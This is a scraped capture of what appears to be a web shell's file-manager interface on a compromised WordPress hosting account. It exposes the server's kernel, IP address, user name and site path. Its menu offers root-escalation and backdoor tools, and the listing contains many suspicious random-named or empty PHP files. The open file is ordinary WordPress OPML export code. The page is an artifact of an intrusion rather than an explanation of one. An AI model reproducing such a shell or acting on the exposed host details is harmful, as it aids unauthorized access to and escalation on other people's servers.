Linux premium309.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
Server IP : 199.188.201.183 & Your IP : 216.73.216.116
Domains :
Cant Read [ /etc/named.conf ]
User : brntxyqh
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
brntxyqh /
selamatimlek3.click /
Delete
Unzip
Name
Size
Permission
Date
Action
.tmb
[ DIR ]
drwxrwxrwx
2026-01-28 00:41
.well-known
[ DIR ]
drwxr-xr-x
2026-01-28 00:41
cgi-bin
[ DIR ]
drwxr-xr-x
2026-02-10 02:31
images
[ DIR ]
drwxr-xr-x
2026-02-10 02:31
wp-admin
[ DIR ]
drwxr-xr-x
2026-02-10 02:31
wp-content
[ DIR ]
drwxr-xr-x
2026-02-10 02:31
wp-includes
[ DIR ]
drwxr-xr-x
2026-02-10 02:31
.hcflag
31
B
-rw-r--r--
2026-02-07 12:30
.htaccess
197
B
-r--r--r--
2026-02-04 02:19
.htaccess.bk
1.01
KB
-rw-r--r--
2025-02-04 03:31
.litespeed_flag
297
B
-rw-r--r--
2026-02-11 02:31
32next.php
1.01
KB
-rw-r--r--
2026-01-04 14:21
Calc.php
0
B
-rw-r--r--
2025-12-15 15:33
action.filesform.php
0
B
-rw-r--r--
2026-01-04 09:09
admingroup_3
2.26
MB
-rwxr--r--
2020-02-06 17:03
adr_battle_pvp.php
0
B
-rw-r--r--
2025-12-03 08:54
arena.php
0
B
-rw-r--r--
2025-12-24 09:40
clans.php
0
B
-rw-r--r--
2025-12-02 13:29
class.php
833
B
-rw-r--r--
2026-01-09 21:58
com_newsfeeds.php
0
B
-rw-r--r--
2025-12-17 09:19
dwrdtymi.php
14.76
KB
-rw-r--r--
2026-01-12 14:28
editpage_actions
2.64
MB
-rwxr--r--
2025-04-16 02:45
error_log
8.08
MB
-rw-r--r--
2026-01-08 17:31
findlink.php
0
B
-rw-r--r--
2025-12-23 15:33
fine.php
960
B
-rw-r--r--
2025-12-23 13:50
import.php
0
B
-rw-r--r--
2025-12-15 19:45
jone.php
0
B
-rw-r--r--
2025-12-29 03:34
license.txt
19.44
KB
-rw-r--r--
2025-04-16 02:45
link.php
0
B
-rw-r--r--
2025-12-02 13:28
livehelp_step3.php
0
B
-rw-r--r--
2025-12-02 13:31
param.php
796
B
-rw-r--r--
2026-01-08 21:47
php.ini
40
B
-rw-r--r--
2026-01-17 21:28
pj_search.php
0
B
-rw-r--r--
2025-12-15 10:43
product_thumb.php
0
B
-rw-r--r--
2026-01-05 12:31
products_map.php
0
B
-rw-r--r--
2026-01-05 11:33
rate_accept02
2.26
MB
-rwxr--r--
2020-02-06 17:03
readme.html
7.25
KB
-rw-r--r--
2025-10-01 03:13
robots.txt
99
B
-rw-r--r--
2026-01-28 00:40
sdlbasic.php
0
B
-rw-r--r--
2025-12-02 13:30
tcpdf.php
0
B
-rw-r--r--
2025-12-24 12:18
vim.php
0
B
-rw-r--r--
2025-12-02 13:30
wp-config.php
3.52
KB
-rw-r--r--
2026-01-08 21:35
wp-links-opml.php
2.44
KB
-rw-r--r--
2025-12-27 15:15
zqzrntvi.php
14.76
KB
-rw-r--r--
2026-01-12 13:18
Save
Rename
<?php /** * Outputs the OPML XML format for getting the links defined in the link * administration. This can be used to export links from one blog over to * another. Links aren't exported by the WordPress export, so this file handles * that. * * This file is not added by default to WordPress theme pages when outputting * feed links. It will have to be added manually for browsers and users to pick * up that this file exists. * * @package WordPress */ require_once __DIR__ . '/wp-load.php'; header( 'Content-Type: text/xml; charset=' . get_option( 'blog_charset' ), true ); $link_cat = ''; if ( ! empty( $_GET['link_cat'] ) ) { $link_cat = $_GET['link_cat']; if ( ! in_array( $link_cat, array( 'all', '0' ), true ) ) { $link_cat = absint( (string) urldecode( $link_cat ) ); } } echo '<?xml version="1.0"?' . ">\n"; ?> <opml version="1.0"> <head> <title> <?php /* translators: %s: Site title. */ printf( __( 'Links for %s' ), esc_attr( get_bloginfo( 'name', 'display' ) ) ); ?> </title> <dateCreated><?php echo gmdate( 'D, d M Y H:i:s' ); ?> GMT</dateCreated> <?php /** * Fires in the OPML header. * * @since 3.0.0 */ do_action( 'opml_head' ); ?> </head> <body> <?php if ( empty( $link_cat ) ) { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, ) ); } else { $cats = get_categories( array( 'taxonomy' => 'link_category', 'hierarchical' => 0, 'include' => $link_cat, ) ); } foreach ( (array) $cats as $cat ) : /** This filter is documented in wp-includes/bookmark-template.php */ $catname = apply_filters( 'link_category', $cat->name ); ?> <outline type="category" title="<?php echo esc_attr( $catname ); ?>"> <?php $bookmarks = get_bookmarks( array( 'category' => $cat->term_id ) ); foreach ( (array) $bookmarks as $bookmark ) : /** * Filters the OPML outline link title text. * * @since 2.2.0 * * @param string $title The OPML outline title text. */ $title = apply_filters( 'link_title', $bookmark->link_name ); ?> <outline text="<?php echo esc_attr( $title ); ?>" type="link" xmlUrl="<?php echo esc_url( $bookmark->link_rss ); ?>" htmlUrl="<?php echo esc_url( $bookmark->link_url ); ?>" updated=" <?php if ( '0000-00-00 00:00:00' !== $bookmark->link_updated ) { echo $bookmark->link_updated; } ?> " /> <?php endforeach; // $bookmarks ?> </outline> <?php endforeach; // $cats ?> </body> </opml>